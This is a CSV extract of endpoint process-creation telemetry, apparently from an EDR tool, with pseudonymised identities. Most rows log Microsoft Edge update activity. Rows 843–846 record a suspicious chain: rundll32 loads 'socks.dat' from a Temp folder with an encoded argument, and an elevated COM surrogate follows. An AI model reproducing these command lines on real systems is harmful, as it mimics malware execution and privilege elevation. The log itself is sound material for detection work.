00:38:05.525093300+00:00,90e8be51-0c1e-4362-9c77-b293eadd1eb0,computerpii_0a470890c60768167990033d701e7bd881398861,180414,False,10.7740.19041.1052,False,11540474045178111,,11540474045178112,2021-06-25 00:36:46.420975300+00:00,1964,2021-06-25 00:36:46.420975300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,1964,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeUpdate,213392,2020-07-01 03:12:51+00:00,2020-09-27 14:36:12.710449400+00:00,2021-06-24 01:43:16.538459700+00:00,2020-09-27 14:36:21.069830800+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update,Microsoft Corporation,Microsoft Edge Installer,91.0.864.59,mini_installer_exe,mini_installer.exe,Microsoft Edge Installer
+838,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:36:54.320823900+00:00,9128,setup.exe,"""setup.exe"" --install-archive=""C:\Windows\TEMP\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp\MSEDGE_PATCH.PACKED.7Z"" --previous-version=""91.0.864.54"" --msedge --verbose-logging --do-not-launch-msedge --system-level",PortableExecutable,2021-06-23 22:58:10+00:00,C:\Windows\Temp\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp\setup.exe,4005264,c869b24543a7b26d8e457798b73b8386,1edcb07238df7b3d03a3d1bc9726c27be1ea2052bbe24f8e1580829d5ab73c42,e0fb3791755c94ed224dfceb3a48412a106ab76d,3f73813504d6baefad1ecb13860c67b1,42eb610efa32a22c11e5dd050fd8d205ddb2084ef364f218ae566cd9364bfda7,057305cde3826a9b63e88a746253637245d457ae,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:36:54.145210600+00:00,15004,MicrosoftEdge_X64_91.0.864.59_91.0.864.54.exe,"""MicrosoftEdge_X64_91.0.864.59_91.0.864.54.exe"" --msedge --verbose-logging --do-not-launch-msedge --system-level",True,2021-06-25 00:36:46.420975300+00:00,1964,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:36:55.272517+00:00,2021-06-25 00:38:05.525340+00:00,97f9b57c-f54d-447f-a010-988bdff111b4,computerpii_0a470890c60768167990033d701e7bd881398861,180419,False,10.7740.19041.1052,False,11540474045178112,,11540474045178113,2021-06-25 00:36:54.145210600+00:00,15004,2021-06-25 00:36:54.145210600+00:00,MicrosoftEdge_X64_91.0.864.59_91.0.864.54.exe,15004,256,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{3A129295-D08C-4B4C-B0CC-6180A7DF14A5},6286736,2021-06-23 22:21:15+00:00,2021-06-25 00:36:53.268583200+00:00,2021-06-25 00:36:54.206869300+00:00,2021-06-25 00:36:53.440944100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge Installer,91.0.864.59,mini_installer_exe,mini_installer.exe,Microsoft Edge Installer,Microsoft Corporation,Microsoft Edge Installer,91.0.864.59,setup_exe,setup.exe,Microsoft Edge Installer
+839,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:36:54.419206600+00:00,11760,setup.exe,"setup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=91.0.4472.114 --annotation=exe=C:\Windows\TEMP\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp\setup.exe --annotation=plat=Win64 ""--annotation=prod=Microsoft Edge"" --annotation=ver=91.0.864.59 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff768d93570,0x7ff768d93580,0x7ff768d93590",PortableExecutable,2021-06-23 22:58:10+00:00,C:\Windows\Temp\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp\setup.exe,4005264,c869b24543a7b26d8e457798b73b8386,1edcb07238df7b3d03a3d1bc9726c27be1ea2052bbe24f8e1580829d5ab73c42,e0fb3791755c94ed224dfceb3a48412a106ab76d,c869b24543a7b26d8e457798b73b8386,1edcb07238df7b3d03a3d1bc9726c27be1ea2052bbe24f8e1580829d5ab73c42,e0fb3791755c94ed224dfceb3a48412a106ab76d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:36:54.320823900+00:00,9128,setup.exe,"""setup.exe"" --install-archive=""C:\Windows\TEMP\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp\MSEDGE_PATCH.PACKED.7Z"" --previous-version=""91.0.864.54"" --msedge --verbose-logging --do-not-launch-msedge --system-level",True,2021-06-25 00:36:54.145210600+00:00,15004,MicrosoftEdge_X64_91.0.864.59_91.0.864.54.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:36:55.273690300+00:00,2021-06-25 00:38:05.525391800+00:00,460b61e7-f6d4-41ec-a4a3-7862f3803887,computerpii_0a470890c60768167990033d701e7bd881398861,180420,False,10.7740.19041.1052,False,11540474045178113,,11540474045178114,2021-06-25 00:36:54.320823900+00:00,9128,2021-06-25 00:36:54.320823900+00:00,\Device\HarddiskVolume3\Windows\Temp\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp\setup.exe,9128,128,ActiveProcessStartkey,C:\Windows\Temp\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp,4005264,2021-06-23 22:21:15+00:00,2021-06-25 00:36:54.269364900+00:00,2021-06-25 00:36:54.425555200+00:00,2021-06-23 22:58:10+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge Installer,91.0.864.59,setup_exe,setup.exe,Microsoft Edge Installer,Microsoft Corporation,Microsoft Edge Installer,91.0.864.59,setup_exe,setup.exe,Microsoft Edge Installer
+840,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:37:06.825962200+00:00,3840,setup.exe,"""setup.exe"" --msedge --register-package-identity --verbose-logging --system-level",PortableExecutable,2021-06-25 00:37:05.924039500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\Installer\setup.exe,4005264,c869b24543a7b26d8e457798b73b8386,1edcb07238df7b3d03a3d1bc9726c27be1ea2052bbe24f8e1580829d5ab73c42,e0fb3791755c94ed224dfceb3a48412a106ab76d,c869b24543a7b26d8e457798b73b8386,1edcb07238df7b3d03a3d1bc9726c27be1ea2052bbe24f8e1580829d5ab73c42,e0fb3791755c94ed224dfceb3a48412a106ab76d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:36:54.320823900+00:00,9128,setup.exe,"""setup.exe"" --install-archive=""C:\Windows\TEMP\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp\MSEDGE_PATCH.PACKED.7Z"" --previous-version=""91.0.864.54"" --msedge --verbose-logging --do-not-launch-msedge --system-level",True,2021-06-25 00:36:54.145210600+00:00,15004,MicrosoftEdge_X64_91.0.864.59_91.0.864.54.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:37:06.967340300+00:00,2021-06-25 00:38:05.535688200+00:00,4a849de1-d001-423a-a7d2-5f0d38941df5,computerpii_0a470890c60768167990033d701e7bd881398861,180615,False,10.7740.19041.1052,False,11540474045178113,,11540474045178115,2021-06-25 00:36:54.320823900+00:00,9128,2021-06-25 00:36:54.320823900+00:00,\Device\HarddiskVolume3\Windows\Temp\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp\setup.exe,9128,128,TerminateProcessStartkey,C:\Windows\Temp\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp,4005264,2021-06-23 22:21:15+00:00,2021-06-25 00:36:54.269364900+00:00,2021-06-25 00:36:54.425555200+00:00,2021-06-23 22:58:10+00:00,2304,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge Installer,91.0.864.59,setup_exe,setup.exe,Microsoft Edge Installer,Microsoft Corporation,Microsoft Edge Installer,91.0.864.59,setup_exe,setup.exe,Microsoft Edge Installer
+841,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:37:06.896303900+00:00,11440,setup.exe,"""setup.exe"" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=91.0.4472.114 ""--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\Installer\setup.exe"" --annotation=plat=Win64 ""--annotation=prod=Microsoft Edge"" --annotation=ver=91.0.864.59 --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x7ff7d7dc3570,0x7ff7d7dc3580,0x7ff7d7dc3590",PortableExecutable,2021-06-25 00:37:05.924039500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\Installer\setup.exe,4005264,c869b24543a7b26d8e457798b73b8386,1edcb07238df7b3d03a3d1bc9726c27be1ea2052bbe24f8e1580829d5ab73c42,e0fb3791755c94ed224dfceb3a48412a106ab76d,c869b24543a7b26d8e457798b73b8386,1edcb07238df7b3d03a3d1bc9726c27be1ea2052bbe24f8e1580829d5ab73c42,e0fb3791755c94ed224dfceb3a48412a106ab76d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:37:06.825962200+00:00,3840,setup.exe,"""setup.exe"" --msedge --register-package-identity --verbose-logging --system-level",True,2021-06-25 00:36:54.320823900+00:00,9128,\Device\HarddiskVolume3\Windows\Temp\FilePII_2ab2f11a8657afa43c873bb8bbf1506c1561b444.tmp\setup.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:37:06.969543500+00:00,2021-06-25 00:38:05.535739800+00:00,695b769e-193a-495a-9b53-c66b541586fe,computerpii_0a470890c60768167990033d701e7bd881398861,180616,False,10.7740.19041.1052,False,11540474045178115,,11540474045178116,2021-06-25 00:37:06.825962200+00:00,3840,2021-06-25 00:37:06.825962200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\Installer\setup.exe,3840,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\Installer,4005264,2021-06-23 22:21:15+00:00,2021-06-25 00:36:54.269364900+00:00,2021-06-25 00:37:06.892528400+00:00,2021-06-25 00:37:05.924039500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,1.0,,256.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge Installer,91.0.864.59,setup_exe,setup.exe,Microsoft Edge Installer,Microsoft Corporation,Microsoft Edge Installer,91.0.864.59,setup_exe,setup.exe,Microsoft Edge Installer
+842,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:37:07.182688400+00:00,316,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNDMuNTciIHNoZWxsX3ZlcnNpb249IjEuMy4xMzMuNSIgaXNtYWNoaW5lPSIxIiBzZXNzaW9uaWQ9IntGM0YyMjQ0OS05M0E1LTQ3MTEtOTk1MC1CNTRERUY0RUU5QzB9IiB1c2VyaWQ9Ins4NzRBNkREMS03Q0RDLTQ3RTktOTczQS1DNTI2M0QyNjZEREN9IiBpbnN0YWxsc291cmNlPSJzY2hlZHVsZXIiIHJlcXVlc3RpZD0iezUwREJFNDY4LTNFRjktNEYyMy04RURDLTNGNkUxNDcxODBCMH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIxIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0My4xMDUyIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NTZFQjE4RjgtQjAwOC00Q0JELUI2RDItOEM5N0ZFN0U5MDYyfSIgdmVyc2lvbj0iOTEuMC44NjQuNTQiIG5leHR2ZXJzaW9uPSI5MS4wLjg2NC41OSIgbGFuZz0iIiBicmFuZD0iV1VMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjI3MCIgaW5zdGFsbGRhdGU9IjUwNTQiIGNvaG9ydD0icnJmQDAuMDUiPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc291cmNlX3VybF9pbmRleD0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzJiZTE3OTMwLTU0ZWMtNGIxNC05ZjllLTZkMDNiYzVjNGEzND9QMT0xNjI1MTg2MjA4JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWlRT1FheFlTd0JqcDI1ZGhUT1dVbVVMMnNGY08zUUYwQThnTmk5RjBWd2tNQjRwem1ETVpuTExwUG5TaWxlMWNaWEQlMmZsTkRzaSUyZlVndU5qeXVQamF1QSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgZG93bmxvYWRlZD0iNjI4NjczNiIgdG90YWw9IjYyODY3MzYiIGRvd25sb2FkX3RpbWVfbXM9IjQ0MTUiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc291cmNlX3VybF9pbmRleD0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NjA5IiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMjI1MiIgZG93bmxvYWRfdGltZV9tcz0iNDY5NiIgZG93bmxvYWRlZD0iNjI4NjczNiIgdG90YWw9IjYyODY3MzYiIGluc3RhbGxfdGltZV9tcz0iMTI5MzYiLz48L2FwcD48L3JlcXVlc3Q-",PortableExecutable,2020-09-27 14:36:21.069830800+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,213392,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:36:46.420975300+00:00,1964,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /svc",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:37:07.211217900+00:00,2021-06-25 00:38:05.536132900+00:00,fd31b862-f627-4bf9-af14-dad34c159453,computerpii_0a470890c60768167990033d701e7bd881398861,180624,False,10.7740.19041.1052,False,11540474045178111,,11540474045178118,2021-06-25 00:36:46.420975300+00:00,1964,2021-06-25 00:36:46.420975300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,1964,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeUpdate,213392,2020-07-01 03:12:51+00:00,2020-09-27 14:36:12.710449400+00:00,2021-06-24 01:43:16.538459700+00:00,2020-09-27 14:36:21.069830800+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,1.0,1025.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update
+843,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:16:42.915578+00:00,11232,cmd.exe,"cmd.exe 41 ""rundll32.exe C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:14:29.844176700+00:00,13028,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-23 03:12:10.599816700+00:00,18532,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:43.097594900+00:00,2021-06-23 03:18:54.662871800+00:00,0e040e1b-7e60-4c5c-bcc3-3b0db2138251,computerpii_0a470890c60768167990033d701e7bd881398861,161259,False,10.7740.19041.1052,False,11540474045173018,,11540474045173042,2021-06-23 03:14:29.844176700+00:00,13028,2021-06-23 03:14:29.844176700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,13028,128,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+844,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:16:42.921301900+00:00,13172,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:42.915578+00:00,11232,cmd.exe,"cmd.exe 41 ""rundll32.exe C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:43.097962200+00:00,2021-06-23 03:18:54.662907+00:00,d4bb9000-d839-47c7-a489-6d029750d560,computerpii_0a470890c60768167990033d701e7bd881398861,161260,False,10.7740.19041.1052,False,11540474045173042,,11540474045173043,2021-06-23 03:16:42.915578+00:00,11232,2021-06-23 03:16:42.915578+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,11232,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+845,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:16:43.640114300+00:00,19304,consent.exe,consent.exe 3388 342 000001C1814DE340,PortableExecutable,2021-02-17 04:35:10.855703500+00:00,C:\Windows\System32\consent.exe,166216,6646631ce4ad7128762352da81f3b030,56b2d516376328129132b815e22379ae8e7176825f059c9374a33cc844482e64,1095bd4b63360fc2968d75622aa745e5523428ab,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:47:25.157136200+00:00,3388,svchost.exe,svchost.exe -k netsvcs -p -s Appinfo,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:43.672016900+00:00,2021-06-23 03:18:54.663045200+00:00,700ce643-c474-4479-aa45-47d6ecb588d4,computerpii_0a470890c60768167990033d701e7bd881398861,161264,False,10.7740.19041.1052,False,11540474045137067,,11540474045173044,2021-06-10 00:47:25.157136200+00:00,3388,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:47:25.530432200+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,consent,consent.exe,Consent UI for administrative applications
+846,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:16:43.772747700+00:00,6872,dllhost.exe,DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:43.930716300+00:00,2021-06-23 03:18:54.663233+00:00,56af9c0e-1429-4ed3-9b54-d21976072175,computerpii_0a470890c60768167990033d701e7bd881398861,161269,False,10.7740.19041.1052,False,11540474045136908,,11540474045173045,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102296,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
